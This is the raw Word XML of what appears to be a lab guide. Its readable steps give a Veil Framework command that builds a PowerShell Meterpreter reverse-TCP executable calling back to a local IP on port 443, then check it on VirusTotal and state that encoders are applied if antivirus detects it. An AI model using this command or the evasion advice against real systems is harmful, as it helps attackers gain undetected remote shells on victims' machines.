                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="074FF703" w14:textId="0EC3AFEE" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00D60A65" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FCD1ACD" wp14:editId="0CD24DCC">
            <wp:extent cx="5499100" cy="3629465"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="198904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43932" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId8"/>
                    <a:srcRect l="10363" t="12536" r="39423" b="12496"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5504861" cy="3633267"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD3F747" w14:textId="77777777" w:rsidR="003D14FC" w:rsidRDefault="003D14FC" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C3F234" w14:textId="34C16F34" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>STEP 2</w:t>
      </w:r>
      <w:r w:rsidR="000176E1" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> After that we create the payload with the help of Veil Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37678873" w14:textId="794EDE93" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">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14F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 : ./Veil.py --tool Evasion -p powershell/meterpreter/rev_tcp.py --ip 192.168.175.162 --port 443 -o aditya23.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EA7886" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--tool = tool which we have opted for payload creation through veil framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531E70DD" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-p = payload name </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DCB35D" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--ip = ip address through which it should connect back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD9D1E7" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--port = which port to attack .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31563999" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-o = name of output file name with which payload should be created </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EC82A4" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="335CA22C" w14:textId="41645156" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00E43F9C" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40913578" wp14:editId="3D2ACB34">
            <wp:extent cx="5512757" cy="3481754"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="189921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12502" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId9"/>
                    <a:srcRect l="10286" t="54701" r="29040" b="11764"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5563192" cy="3513608"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1551E549" w14:textId="77777777" w:rsidR="003961F8" w:rsidRDefault="003961F8" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7305A25A" w14:textId="77777777" w:rsidR="003D14FC" w:rsidRDefault="003D14FC" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3628BF4D" w14:textId="77777777" w:rsidR="003D14FC" w:rsidRDefault="003D14FC" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F057C5D" w14:textId="77777777" w:rsidR="003D14FC" w:rsidRDefault="003D14FC" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6776A4FB" w14:textId="77777777" w:rsidR="003D14FC" w:rsidRPr="003D14FC" w:rsidRDefault="003D14FC" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C20A89" w14:textId="529E1329" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>STEP 3) After that we have to check the file in virustotal whether it is detecting payload as vulnerable file or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075B3E25" w14:textId="77777777" w:rsidR="003961F8" w:rsidRPr="003D14FC" w:rsidRDefault="003961F8" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541B2A7F" w14:textId="03BDF785" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00A804DA" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29CD4A23" wp14:editId="3326F5EA">
            <wp:extent cx="5823585" cy="3432517"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="118401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10555" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId10"/>
                    <a:srcRect l="10652" t="12834" b="9314"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5837351" cy="3440631"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="313A263A" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED93B9D" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As this file is undetectable by any of the antivirus software so can do further process on it but if it was accessable by any one of it then we use encoders for it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED0C6E3" w14:textId="095A8BF7" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">But </w:t>
      </w:r>
      <w:r w:rsidR="003961F8" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n this case, we will not encode it as it is undetectable by any of antivirus software companies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6AA590" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685E80DE" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C82B2B9" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0F102B" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D25E0B6" w14:textId="77777777" w:rsidR="00674EDD" w:rsidRPr="003D14FC" w:rsidRDefault="00674EDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00674EDD" w:rsidRPr="003D14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F96757" w14:textId="77777777" w:rsidR="00862E13" w:rsidRDefault="00862E13" w:rsidP="00950824">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="120B71F8" w14:textId="77777777" w:rsidR="00862E13" w:rsidRDefault="00862E13" w:rsidP="009508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5ADCDD" w14:textId="77777777" w:rsidR="00862E13" w:rsidRDefault="00862E13" w:rsidP="00950824">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0C9F228F" w14:textId="77777777" w:rsidR="00862E13" w:rsidRDefault="00862E13" w:rsidP="009508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F51F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5E8B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47046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5E0"/>
    <w:rsid w:val="000176E1"/>
    <w:rsid w:val="001A5023"/>
    <w:rsid w:val="002905E0"/>
    <w:rsid w:val="002971CC"/>
    <w:rsid w:val="00324F9B"/>
    <w:rsid w:val="00343C3E"/>
    <w:rsid w:val="003961F8"/>
    <w:rsid w:val="003D14FC"/>
    <w:rsid w:val="00674EDD"/>
    <w:rsid w:val="00695050"/>
    <w:rsid w:val="00723098"/>
    <w:rsid w:val="007A08A1"/>
    <w:rsid w:val="008104C2"/>
    <w:rsid w:val="00862E13"/>
    <w:rsid w:val="00950824"/>
    <w:rsid w:val="009B00CF"/>
    <w:rsid w:val="009F173C"/>
    <w:rsid w:val="00A804DA"/>
    <w:rsid w:val="00B36570"/>
    <w:rsid w:val="00BC1BED"/>
    <w:rsid w:val="00C375FA"/>
    <w:rsid w:val="00CA0E06"/>
    <w:rsid w:val="00D60A65"/>
    <w:rsid w:val="00D6461E"/>
    <w:rsid w:val="00D67C01"/>
    <w:rsid w:val="00D86238"/>
    <w:rsid w:val="00E43F9C"/>
    <w:rsid w:val="00E75C5F"/>
    <w:rsid w:val="00FD7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4EACB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E3B69A9D-FE97-43D0-BBFA-C7EE3D49D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BED"/>
    <w:pPr>
      <w:spacing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08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0824"/>
    <w:rPr>
      <w:lang w:val="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009508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0824"/>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66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4</Pages>
  <Words>277</Words>
  <Characters>1581</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>13</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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adhavprajwal125@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Prajwal Adhav</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-23T07:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-11T15:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>